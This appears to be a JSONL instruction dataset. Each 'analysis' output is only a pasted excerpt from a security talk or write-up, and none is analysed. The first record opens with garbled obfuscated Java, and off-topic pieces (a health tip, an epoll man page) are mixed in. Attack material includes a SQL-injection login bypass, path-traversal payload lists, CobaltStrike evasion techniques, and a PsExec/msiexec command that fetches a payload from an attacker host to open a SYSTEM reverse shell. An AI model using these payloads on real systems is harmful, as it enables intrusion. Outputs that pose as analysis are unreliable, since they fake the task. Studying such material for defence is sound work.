Class.forName(COn.ˊ(GCOn.ˋ[0xC],!COn.ˋ[0x12],!GCOn.ˋ[0x10])).getMethod(COn.ˊ(i1,!i2,!i2!|!6),!Integer.TYPE)! ! ! ! .invoke(null,!Integer.valueOf(0));! ! ! return;! ! }!catch:(Throwable!throwable)!{! ! ! throw!throwable.getCause();! ! }! } So - UPX and other stupid stuff? PACKERS, PROTECTORS?  Pro", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# BMP --- ## 什么是BMP BMP全称 Bitmap是 Windows 操作系统中的标准图像文件格式可以分成两类设备有向量相关位图DDB和设备无向量相关位图DIB使用非常广它采用位映射存储格式除了图像深度可选以外不采用其他任何压缩因此BMP 文件所占用的空间很大BMP 文件的图像深度可选 lbit4bit8bit 及 24bitBMP 文件存储数据时图像的扫描方式是按从左到右从下到上的顺序由于 BMP 文件格式是 Windows 环境中交换与图有关的数据的一种标准因此在 Windows 环境中运行的图形图像软件都支持 BMP 图像格式 典型的 BMP 图像文件由四部分组成 1. 位图头文件数据结构它包含 BMP 图像文件的类型显示内容等信息 2. 位图信息数据结构它包含有 BMP 图像的宽高压缩方法以及定义颜色等信息 3. 调色板这个部分是可选的有些位图需要调色板有些位图比如真彩色图24 位的 BMP就不需要调色板 4. 位图数据这部分的内容根据 BMP 位图使用的位数不同而不同在 24 位图中直接使用 RGB而其他的小于 24 位的使用调色板中颜色索引值 --- ## 图片结构头及宽高计算 bmp 文件头 BM 首先需要了解到的文件头和 bitmapinfoheader 字段有 ### bfType 2字节 一定为19778其转化为十六进制为 `0x4d42`对应的字符串为BM ### bfSize 4字节 文件大小 0x00000050=80(Byte) ### bfReserved1 2字节 一般为0 ### bfReserved2 2字节 一般为0 ### bfOffBits 4字节 从文件开始处到像素数据的偏移也就是这两个结构体大小之和 36 00 00 00(0x36) 转换成十进制是 54, 从 BMP 文件的第一个字节开始到第 54 个字节就是像素的开始 对像素内容覆盖不会影响图片的读取,如果出现图片缺损大概率是破坏了前面的部分 ### biSize 4字节 此结构体的大小 ### biWidth 4字节 图像的宽 ### biHeight 4字节 图像的高 ### biPlanes 2字节 图像的帧数一般为1 ### biBitCount 2字节 一像素所占的位数一般是24 ### biCompression 4字节 一般为0 ### biSizeImage 4字节 像素数据所占大小即结构体中文件大小减去偏移(bfSize-bfOffBits) 其中存在关系为biSizeImage=bfSize-bfOffBits =biWidth*biHeight*biBitCount/8 换句话来说就是 height=biSizeImage/biWidth/(biBitCount/8) --- ## Source & Reference - [misc-stegaBasic](https://www.jianshu.com/p/fe7a5fff2a95) - [BMP位图隐写](https://payloads.online/archivers/2019-01-31/1)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 The Death of Cash The Death of Cash The Loss of Anonymity and Other Dangers of Modern Financial Systems Defcon 16 Las Vegas 2008 2 Agenda Agenda Introduction Bold Claims Why THEY Hate Cash Utopian and Dystopian Versions of the Cash Free Society CTRs and SARs Other Regulations Regarding Cash The Liquidity Danger Exceptions Alternatives 3 Shameless promotional plug Shameless promotional plug Tony Howlett President of Network Security Services, Inc. CISSP, GSNA. Author of Open Source Security Tools and numerous articles (Google Tony Howlett). Co-Host of Fearless Security blog on Windowsitpro.com. Infosec consultant to the Banking industry. 19 years of experience building and managing networks. 4 The Death of Cash The Death of Cash Synopsis and Preview of my next book THE DEATH OF CASH due out in 2009. How government forces, strong crypto and globalization of financial systems will conspire to eliminate cash from our economy. Why this is a BAD thing? Evaluation of pros and cons of next generation financial systems. 5 Bold claims Bold claims Cash, as a store of financial value will be dead in the US within 20 years. Old Theory: The government will outlaw cash, then only the criminals will have cash. New Theory: Cash will die a natural death; we will willingly abandon it for more convenient financial tools. 6 Why? Why? Credit/debit is convenient. Credit/debit seems more modern, techy. Credit/debit is easy to spend. Credit/debit is being pushed relentlessly by everyone from the government to banks to big business. 7 Why is this a Why is this a BAD BAD thing? thing? Loss of anonymity. Loss of control to government, banks, big business. Bad for your financial health. Bad for national security?... 8 What is cash? What is cash? Paper Money Coinage  Some coins cost more to produce than they are actually worth (1c=1.23c, 5c= 5.73c). Checks  Treated the same as cash, since they are hard to track, hard to verify, and not really a part of the global electronic financial network. ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@Y4tacker ROME改造计划 成果 从ysoserial原本的4000+缩短到1320Base64+弹计算器 写在前 先常感谢这次的D3CTF给我次学习的机会两个Java题都挺有意思学到了不同的东 西因为第个较简单就不分享了这分享下如何去缩短ROME利链本我也是 之前没学习过ROME这以个旁观者的视来讲述好累全篇没有各种级技术不涉及 ASM 的改造仅仅只是些Trick和利链的精简同时常感谢我的同学@HolaAs以及我的 朋友@风潇在我做题过程当中给我的帮助 简单分析 先看看路由很简单要求传字符长度不超过1956 接下来免不了找依赖后发现了ROME可以在ysoserial直接可以惊讶的看到这 只有短短的4400那么短痛太痛了 哎呀怎么办呢既然要改造免不了需要先看看调链 /** * * TemplatesImpl.getOutputProperties() * NativeMethodAccessorImpl.invoke0(Method, Object, Object[]) * NativeMethodAccessorImpl.invoke(Object, Object[]) * DelegatingMethodAccessorImpl.invoke(Object, Object[]) * Method.invoke(Object, Object...) * ToStringBean.toString(String) * ToStringBean.toString() * ObjectBean.toString() * EqualsBean.beanHashCode() * ObjectBean.hashCode() * HashMap<K,V>.hash(Object) * HashMap<K,V>.readObject(ObjectInputStream) * * */ 既然要改造我的思路是先精简利链再减少细节 看到这我能有个想法就是从调readObject到tostring都能尝试类替换最下层的个感觉似 乎没啥必要了那直接再往上啰 简单了解 很明显既然要尝试去改造条链那第步就要去深了解他 这就省去介绍 ObjectBean  ToStringBean 等类了百度都有不做搬运 先做个简单总结 1. HashMap->readObject 触发 ObjectBean->hashCode 2. 触发ObjectBean 内封装的 ObjectBean -> toString 法之后就可以触发利链 也简单看看图啰 EqualsBean触发toString 紧接 着 com.sun.syndication.feed.impl.ToStringBean#toString(java.lang.String) 会调所有 getter 法多提嘴其实 BeanIntrospector.getPropertyDescriptors 会 获取所有getter/setter但是下有参数长度0那按照正常代码就只剩getter了 因此最终通过触发getOutputProperties实现字节码加载 通常ysoserial更细节会多很多细节可能会更短但不影响这我们简单按照逻辑写下 代码加深理解 果然不出我所料更长了 但这主要是学习思路 改造 失败滴改造尝试 可以很明显的看到在这有个触发toString的过程那么很容易就能想到之前通过 BadAttributeValueExpException 去触发 toString 这件事构造完后看看哦寄了属 于是帮倒忙第名了拜拜再见不联系了嘞 成功滴改造尝试 Step1--改造利链 在之前的过程当中有个地常吸引 我 com.sun.syndication.feed.impl.EqualsBean#equals 法 可以看到 equals 最终调 beanEquals 这不就和 com.sun.syndication.feed.impl.ToStringBean#toString 很像么但是如何能触发 equals 法呢 借p的句话但是jdk7u21的场景不适合我们这原因请看p知识星球打波告p 看到请给钱 调equals的场景就是集合setset中储存的对象不允许重复所以在添加对象的时候 势必会涉及到较操作 但是这个很明显并不适合我们这个场景两个相同对象hashCode都样了就不可能成功了 不多说想 那还有啥利么当然有的如HashMap对key也有这个神奇的机制 为了解决这个问题我们抽丝剥茧慢慢来啰下的只是对后做铺垫 先来个简单的场景先看下这个代码 会觉得他们相同吗答案很显然 为什么呢可以看到由于我们value为空其实就是较key的hashCode了 对于个String类型其hashCode考虑两个元素的场景也", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Wpwn > https://download.vulnhub.com/wpwn/wpwnvm.zip 靶场IP`192.168.32.135` 扫描对外端口服务 ``` (rootkali)-[/tmp] # nmap -p1-65535 -sV 192.168.2.135 Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-06 09:35 EDT Nmap scan report for 192.168.2.135 Host is up (0.00071s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) MAC Address: 00:0C:29:DB:E7:B5 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds ``` 浏览器访问80端口 ![image-20220906213634428](../../.gitbook/assets/image-20220906213634428.png) 爆破目录 ``` (rootkali)-[/tmp] # gobuster dir -u http://192.168.2.135/ -w /usr/share/wordlists/dirb/common.txt -t 30 1  =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.2.135/ [+] Method: GET [+] Threads: 30 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/09/06 09:37:19 Starting gobuster in directory enumeration mode =============================================================== /.htpasswd (Status: 403) [Size: 278] /.htaccess (Status: 403) [Size: 278] /.hta (Status: 403) [Size: 278] /index.html (Status: 200) [Size: 134] /robots.txt (Status: 200) [Size: 57] /server-status (Status: 403) [Size: 278] /wordpress (Status: 301) [Size: 318] [--> http://192.168.2.135/wordpress/] =============================================================== 2022/09/06 09:37:24 Finished =============================================================== ``` 访问`/wordpress/` ![image-20220906214449737](../../", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 CobaltStrike内存免杀-AceLdr 分享个 CobaltStrike内存免杀的具. https://github.com/kyleavery/AceLdr 作者收集了市上公开的内存查杀技术, 1. Hunt-Sleeping-Beacons 2. BeaconHunter 3. BeaconEye 4. Patriot 5. Moneta 6. PE-sieve 7. MalMemDetect. 然后再做出对应的对抗,涉及到的技巧: Creates a new heap for any allocations from Beacon and encrypts entries before sleep. Changes the memory containing CS executable code to non-executable and encrypts it (FOLIAGE). Certain WinAPI calls are executed with a spoofed return address (InternetConnectA, NtWaitForSingleObject, RtlAllocateHeap). Delayed execution using WaitForSingleObjectEx. All encryption performed with SystemFunction032. 测试效果 - QQmusic是经过处理后的 - acelr是默认成      2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Your Banks Digital Side Door @sdanndev 2 Because thats where the money is. Willie Sutton, Bank Robber 3 Why does my bank website require my 2-factor token, but pulling my transactions into Quicken does not? 4 Personal Financial Management PFM 5 Personal Financial Management (PFM) 7 8 9 10 11 12 13 Quicken/Quickbooks Connection Types Web Connect  Unidirectional  Manual  Download a file  OFX file format Express Web Connect  Unidirectional  Programmatic  Screen scrape  Private web service Direct Connect  Bidirectional  Programmatic  Structured query  OFX protocol 14 Web Connect Express Web Connect Direct Connect Desktop Application Middle-Man Financial Institution OFX 15 Account Aggregation Service / API 16 Web Application Middle-Man Financial Institution OFX 17 Personal Threat Model  Assets  Checking account  Brokerage account  Threats  Credentials are stolen  Accounts are accessible without credentials @mrvaughan: https://youtu.be/PIwvxSZj5e8 18 Lack of Least Privilege  Users have 1 set of bank credentials  Full read / write access to all accounts at financial institution  Plain text password is shared with and stored by aggregators  Tokenized application-based access control (OAuth) is needed 19 Open Financial Exchange (OFX) aka Direct Connect 20 Banking  Checking  Savings  CDs  Loans Investment  IRA  401k  Holdings  Equity Prices Credit Cards  Transactions Transfers  Bill Pay  Intrabank  Interbank  Wire Funds OFX Functionality - Financial 21 OFX Functionality - Miscellaneous  Enrollment  Setup online access  Password Reset  FI Profile  Like a homepage  Email  Messages and Notifications  Synchronization  Ensure multiple clients receive 1-time messages.  Image download  JPEG, TIFF, PNG, PDF  Bill Presentment  For 3rd parties 22 www.ofx.org POST /cgi/ofx HTTP/1.1 Accept: */* Content-Type: application/x-ofx Date: Fri, 16 Jun 2018 21:12:27 GMT User-Agent: InetClntApp/3.0 Content-Length: 570 Connection: close OFXHEADER:100 DATA:OFXSGML VERSION:103 SECURITY:NONE ENCODIN", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to do it Wrong: Smartphone Antivirus and Security Applications Under Fire Stephan Huber, Siegfried Rasthofer, Steven Arzt, Michael Tröger, Andreas Wittmann, Philipp Roskosch, Daniel Magin 1 2 Who are we Siegfried Stephan  Mobile Security Researcher at Fraunhofer SIT  Enjoys teaching students in Android Hacking  4th year PhD Student at TU Darmstadt / Fraunhofer SIT  Enjoys drinking bavarian beer  @teamsik 3 Mobile Banking Security 4 Malware Detection Engine Spam Protection Secure Browsing Device Configuration Advisor Privacy Advisor Premium Features 5 6 App GooglePlay Downloads Pseudo AV Apps AndroHelm 1-5 Mio Malwarebytes 5-10 Mio ESET 5-10 Mio Avira 10-50 Mio Kaspersky 10-50 Mio McAfee 10-50 Mio CM Security 100-500 Mio 7 #Challenges Premium Upgrade for Free? Misuse Lost-Device Feature (Ransomware)? Remotely Influence Scan Engine Behavior? Remote Code Execution? Premium Upgrade for Free? (1/2 Examples) AndroHelm 8 9 Free Premium the Simple Way 10 Lets Have a Look at the Free App  this.toast(\"Thank you for upgrading to PRO!\"); //shared pref value set to true this.prefs.putBoolean(\"isPro\", true);  Interesting code snippet: <?xml version='1.0' encoding='utf-8' standalone='yes' ?> <map> <int name=\"dialogShowTimes\" value=\"1\" /> <boolean name=\"hasDatabase\" value=\"true\" /> <string name=\"lastFragment\"></string> </map> SharedPreferences at first install: <boolean name=\"isPro\" value=\"true\" /> key/value pair for xml file 11 Changing XML File Without Root adb backup com.androhelm.antivirus.free2 restore com.androhelm.antivirus.free2 debug bridge tar -xvf mybackup.tar nano com.androhelm.antivirus.free.preferences.xml * *\"h$ps://github.com/nelenkov/android:backup:extractor\" Premium Upgrade for Free? (2/2 Examples) ESET 12 13 ESET License Verification SSL/TLS Protection https - request containing credentials / license info There are known vulnerabilities for SSL/TLS, but is there an easier way? ? ESET Security App ESET Backend 14 One\"requirement\"for\"secure\"communica?on\"is\"the\"verifi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecondary Contexts Mahmoud M. Awali @0xAwali attacker Tricks To Identify Some \" Hidden \" Reverse HTTP Proxies TRACE OR GET /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com Max-Forwards: Number e.g. 1 , 2 OR 3 User-Agent: Mozilla/5.0 Referer: https://previous.com/path Origin: https://www.company.com Rules Will Use To Figure Out There Is Reverse Proxy 502 Bad Gateway status code 483 status code When Using TRACE , The Body Contains The ' X-Forwarded-For ' String ' Via ' OR ' X-Via ' Headers Are Detected Some Fields Are Different Between Hops : HTTP Status Codes ' Server ' Headers ' Content-Type ' Headers ' Via ' Headers HTML Titles HTML ' Address ' Tags ' X-Forwarded-For ' Values In Body  Blog attacker Tricks To Identify Routing Of HTTP Request Does /Endpoint-To-Proxy/../ Return Something Different Than / Does /Endpoint-To-Proxy/../ Return Headers Different Than / Try To Inject Encode , Double OR Triple URL Encoding In Parameters # %23 ? %3F & %26 . %2e / %2F @ %40 e.g. https://www.company.com/api/path?id=%23 Try To Inject Encode , Double OR Triple URL Encoding These Payloads After URL ..%2f%23 ..;/ ..%00/ ..%0d/ ..%5c ..\\ ..%ff/ %2e%2e%2f .%2e/ e.g. https://www.company.com/api/..%00/  Blog  Video  Tweet attacker My Methodology Try To Use OPTIONS Method To Figure Out Are There Sub-Endpoints e.g. Endpoint-To-Proxy/Another-Endpoint  Tweet Try To Change Request Method To PUT If You Got 201 Created Then There Is RCE PUT /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Referer: https://previous.com/path Origin: https://www.company.com attacker My Methodology  Blog  Blog  Writeup attacker My Methodology Try To Append .json Extension To Your Endpoints e.g. /endpoint-To-Proxy.json To Get Sensitive Information  Tweet attacker My Methodology Try To Figure Out Are There Endpoints Accept Establishing HTTP/2 Cleartext , If Yes Try To Smuggler It By Using Tool e.g. h2csmuggler Steps to produce :- 1 - Collect All The Endpoints 2 - Put It In File Called e.g. ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOffensive Windows IPC Internals 3: ALPC 24 May 2022 Contents: Introduction ALPC Internals The Basics ALPC Message Flow ALPC Messaging Details ALPC Message Attributes Putting the pieces together: A Sample Application Attack Surface Identify Targets Impersonation and Non-Impersonation Unfreed Message Objects Conclousion Appendix A: The use of connection and communication ports References Introduction After talking about two inter-process communication (IPC) protocols that can be uses remotely as well as locally, namely Named Pipes and RPC, with ALPC were now looking at a technology that can only be used locally. While RPC stands for Remote Procedure Call, ALPC reads out to Advanced Local Procedure Call, sometimes also referenced as Asynchronous Local Procedure Call. Especially the later reference (asynchronous) is a reference to the days of Windows Vista when ALPC was introduced to replace LPC (Local Procedure Call), which is the predecessor IPC mechanism used until the rise of Windows Vista. A quick word on LPC The local procedure call mechanism was introduced with the original Windows NT kernel in 1993- 94 as a synchronous inter-process communication facility. Its synchronous nature meant that clients/servers had to wait for a message to dispatched and acted upon before execution could continue. This was one of the main flaws that ALPC was designed to replace and the reason why ALPC is referred to by some as asynchronous LPC. ALPC was brought to light with Windows Vista and at least from Windows 7 onward LPC was completely removed from the NT kernel. To not break legacy applications and allow for backwards compatibility, which Microsoft is (in)famously known for, the function used to create an LPC port was kept, but the function call was redirected to not create an LPC, but an ALPC port. As LPC is effectively gone since Windows 7, this post will only focus on ALPC, so lets get back to it. But, if youre - like me - enjoy reading old(er) documentations of how things s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (C) 2003 Davide Libenzi .\\\" .\\\" %%%LICENSE_START(GPLv2+_SW_3_PARA) .\\\" This program is free software; you can redistribute it and/or modify .\\\" it under the terms of the GNU General Public License as published by .\\\" the Free Software Foundation; either version 2 of the License, or .\\\" (at your option) any later version. .\\\" .\\\" This program is distributed in the hope that it will be useful, .\\\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\\\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\\\" GNU General Public License for more details. .\\\" .\\\" You should have received a copy of the GNU General Public .\\\" License along with this manual; if not, see .\\\" <http://www.gnu.org/licenses/>. .\\\" %%%LICENSE_END .\\\" .\\\" Davide Libenzi <davidel@xmailserver.org> .\\\" .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH EPOLL 7 2021\\-03\\-22 Linux \"Linux Programmer's Manual\" .SH 名称 epoll \\- I/O 事件通知设施 .SH 概要 .nf \\fB#include <sys/epoll.h>\\fP .fi .SH 说明 \\fBepoll\\fP API 的任务与 \\fBpoll\\fP(2) 类似监控多个文件描述符找出其中可以进行I/O 的文件描述符 \\fBepoll\\fP API 既可以作为边缘触发edge\\-triggered的接口使用也可以作为水平触发level\\-triggered的接口使用并能很好地扩展监视大量文件描述符 .PP \\fBepoll\\fP API 的核心概念是 \\fBepoll\\fP \\fI实例\\fP\\fBepoll\\fP \\fIinstance\\fP这是内核的一个内部数据结构从用户空间的角度看它可以被看作一个内含两个列表的容器 .IP \\(bu 2 \\fI兴趣\\fP列表\\fIinterest\\fP list有时也称为 \\fBepoll\\fP 集\\fBepoll\\fP set进程注册了监控兴趣的文件描述符的集合 .IP \\(bu \\fI就绪\\fP列表\\fIready\\fP list准备好进行 I/O 的文件描述符的集合就绪列表是兴趣列表中的文件描述符的子集或者更准确地说是其引用的集合内核会根据这些文件描述符上的 I/O 活动动态地填充就绪列表 .PP 下列系统调用可用于创建和管理 \\fBepoll\\fP 实例 .IP \\(bu 2 \\fBepoll_create\\fP(2) 会创建一个新的 \\fBepoll\\fP 实例并返回一个指向该实例的文件描述符最新的 \\fBepoll_create1\\fP(2) 扩展了 \\fBepoll_create\\fP(2) 的功能 .IP \\(bu \\fBepoll_ctl\\fP(2) 能向 \\fBepoll\\fP 实例的兴趣列表中添加项目注册对特定文件描述符的兴趣 .IP \\(bu .\\\" \\fBepoll_wait\\fP(2) 会等待 I/O 事件如果当前没有事件可用则阻塞调用它的线程此系统调用可被看作从 \\fBepoll\\fP 实例的就绪列表中获取项目 .SS 水平触发与边缘触发 \\fBepoll\\fP", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Micro-CMS v2 - FLAG0 ## 0x00 Index ![](./imgs/index.jpg) ## 0x01 Log In Try create a new page. Redirect to log in page. Try with weak password. Not working. ![](./imgs/login.jpg) ## 0x02 Try Add ' Get SQL error page ``` Traceback (most recent call last): File \"./main.py\", line 145, in do_login if cur.execute('SELECT password FROM admins WHERE username=\\'%s\\'' % request.form['username'].replace('%', '%%')) == 0: File \"/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py\", line 255, in execute self.errorhandler(self, exc, value) File \"/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py\", line 50, in defaulterrorhandler raise errorvalue ProgrammingError: (1064, \"You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1\") ``` ## 0x03 Bypass Login USERNAME = ```sql ' UNION SELECT '123' AS password# ``` and PASSWORD = 123 ```sql SELECT password FROM admins WHERE username='admin' UNION SELECT '123' AS password# ``` ![](./imgs/success.jpg) ## 0x04 Private Page (FLAG) ![](./imgs/private.jpg) ![](./imgs/flag.jpg)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Vista Log Forensics Dr. Rich Murphey, ACS Background Case Study Engagement Preliminary Report Final Report Vista Event Logging Logging Service Vista Event Encoding Undocumented Internals Event Log Analysis Recovery Correlation Interpretation Shadow Copy Services Provider C Provider C Provider B Provider B Provider A Provider A Controller Controller Log files Log files Controller Controller  Consumer Consumer Real time delivery Logged Events Session 1 Buffers Session 2 Session 64 Events Events Enable/Disable Session Control Consumer Consumer Windows Kernel Repair Correlate Recover 2 Acknowledgements Shouts out to: MD5, Caesar HTA Fednaughty DT Thanks to: Jerlyn Mardis, ACS Josh Pennell, IO Active Matthew Geiger, CERT Dedicated to: BitMonk (HTA/Ad Hoc) 3 Special Thanks To Sponsor: Forensics In-depth Analysis, Expert Witness Data Recovery Complex RAID, Exotic File Systems Consulting Information Security This is not: Legal Advice Suitable for testimony 4 Rich Murphey Experience: Rice University Ph.D. Electrical and Computer Engineering UTMB Med. School Faculty, Physiology & Biophysics Pentasafe Security Chief Scientist Applied Cognitive Soln. Chief Scientist Expert Witness CISSP, ACE, EnCE An Author of: GNU Graphics Asterisk VOIP See Authors FreeBSD Founding Core Team XFree86 man xorg | grep Rich 5 For More Info C. R. Murphey, Automated Windows Event Log Forensics, Digital Investigation, August 2007 A peer-reviewed paper on a new tool for automating XP log recovery and analysis Digital Forensic Research Workshop, 8/13/07 HTCIA National 8/27/07 6 Roadmap Background Case Study Engagement Preliminary Results Revised Scope Vista Event Logging Events Logging Service Undocumented Internals Event Log Analysis Recovery Correlation Report Shadow Copy Services Provider C Provider C Provider B Provider B Provider A Provider A Controller Controller Log files Log files Controller Controller  Consumer Consumer Real time delivery Logged Events Session 1 Buffers Session 2 Session 64 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Owning the Users With The Middler Copyright 2008 Jay Beale Jay Beale Co-Founder, Intelguardians Author, Bastille UNIX 2 Copyright 2008 Jay Beale Talk Agenda Im releasing The Middler now, an attack proxy tool to automate attacks on browsers and everything else using HTTP. Heres the Talk Agenda:  The Attack Vector: Shared Networks  Automatically exploiting mixed HTTP/HTTPS sites, including Gmail, LinkedIn and LiveJournal  Launching non-interactive CSRF attacks on Online Banks  Trojaning software installation and update  Injecting browser-exploits and adding root certificates  Protecting yourself on hostile LANs 3 Copyright 2008 Jay Beale HTTP and Shared Networks Dont Mix Most users use a tremendous number of shared networks when they leave their homes and offices.  Hotels  Non-security Conferences  Coffee Shops / Bookstores  Airplanes Whether those are wireless or wired networks, they open themselves up to application-level monitoring and attack constantly. 4 Copyright 2008 Jay Beale Proxy Attacks If we share a LAN, I can view and modify all of your traffic: I can replace the real DHCP server on the network, setting my laptop up as your DNS server, DHCP server, and router. OR I can ARP spoof the real router and any local DNS servers. 5 Copyright 2008 Jay Beale Mixed HTTPS/HTTP Sites are a Menace Many companies misunderstand that encrypting only their applications password form leaves their users very vulnerable to man in the middle attacks. Before we demo an attack on this, lets look at how LinkedIn.com works. If you start up your browser with https://www.linkedin.com, click on Sign In, youll be taken to this URL: https://www.linkedin.com/secure/login?trk=hb_signin Following sign-in, youre taken to this one: http://www.linkedin.com/home 6 Copyright 2008 Jay Beale What if I change the URL? You can change the URL to: https://www.linkedin.com/home but clicking on any link will just take you right back to an HTTP URL! Unless you modify your browser or surf with a specia", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSummary of Attacks Against BIOS and Secure Boot Yuriy Bulygin, John Loucaides, Andrew Furtak, Oleksandr Bazhaniuk, Alexander Matrosov Intel Security In The Beginning Was The Legacy BIOS.. Legacy BIOS 1. CPU Reset vector in BIOS ROM (Boot Block) 2. Basic CPU, chipset initialization 3. Initialize Cache-as-RAM, load and run from cache 4. Initialize DIMMs, create address map.. 5. Enumerate PCIe devices.. 6. Execute Option ROMs on expansion cards 7. Load and execute MBR 8. 2nd Stage Boot Loader OS Loader OS kernel Also Technical Note: UEFI BIOS vs. Legacy BIOS, Advantech Then World Moved to UEFI.. UEFI Boot From Secure Boot, Network Boot, Verified Boot, oh my and almost every publication on UEFI UEFI [Compliant] Firmware SEC Pre-EFI Init (PEI) Driver Exec Env (DXE) Boot Dev Select (BDS) Runtime / OS S-CRTM; Init caches/MTRRs; Cache-as-RAM (NEM); Recovery; TPM Init S-CRTM: Measure DXE/BDS Early CPU/PCH Init Memory (DIMMs, DRAM) Init, SMM Init Continue initialization of platform & devices Enum FV, dispatch drivers (network, I/O, service..) Produce Boot and Runtime Services Boot Manager (Select Boot Device) EFI Shell/Apps; OS Boot Loader(s) ExitBootServices. Minimal UEFI services (Variable) ACPI, UEFI SystemTable, SMBIOS table CPU Reset Signed BIOS Update & OS Secure Boot Signed BIOS Update UEFI Secure Boot Windows 8 Secure Boot Attacks Against Both Of These.. BIOS Attack Surface: SPI Flash Protection System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. SPI Flash Write Protection  Often still not properly enabled on many systems  SMM based write protection of entire BIOS region is often not used: BIOS_CONTROL[SMM_BWP]  If SPI Protected Ranges (mode agnostic) are used (defined by PR0- PR4 in SPI MMIO), they often dont cover entire BIOS & NVRAM  Some platforms use SPI device specific WP protection but only for boot block/startup code or SPI Flash descriptor region  Persiste", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n**注**请多喝点热水或者凉白开可预防**肾结石通风**等 痛风可伴发肥胖症高血压病糖尿病脂代谢紊乱等多种代谢性疾病 ### PsExec简介 微软于2006年7月收购sysinternals公司PsExec是SysinternalsSuite的小工具之一是一种轻量级的telnet替代品允许在其他系统上执行进程完成控制台应用程序的完全交互而无需手动安装客户端软件并且可以获得与控制台应用程序相当的完全交互性 微软官方文档 https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec 说明PsExec.exe没有默认安装在windows系统 **攻击机** 192.168.1.4 Debian **靶机** 192.168.1.119 Windows 2003 ### 配置攻击机msf ```bash msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description     Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description     EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.4 yes The listen address (an interface may be specified) LPORT 53 yes The listen port Exploit target: Id Name   0 Wildcard Target msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.4:53 ``` ![](media/665d55d525ed72757f30454ada5a71de.jpg) ### 靶机执行 ![](media/3832b47f170fb110c44a283765b4bfd4.jpg) ```bash PsExec.exe -d -s msiexec.exe /q /i <http://192.168.1.4/Micropoor_rev_x86_msi_53.txt> ``` ![](media/ac4359c43440d555b4e873409425927c.jpg) ```bash msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.4:53 [*] Sending stage (179779 bytes) to 192.168.1.119 [*] Meterpreter session 11 opened (192.168.1.4:53 > 192.168.1.119:131) at 20190120 05:43:32 0500 meterpreter > getuid Server username: NT AUTHORITY\\SYSTEM meterpreter > getpid Current pid: 728 meterpreter > ``` ![](media/14842fe0c4f8775c8de53de6583282a1.jpg) > Micropoor", "category": "text_analysis", "source": "security_papers"}
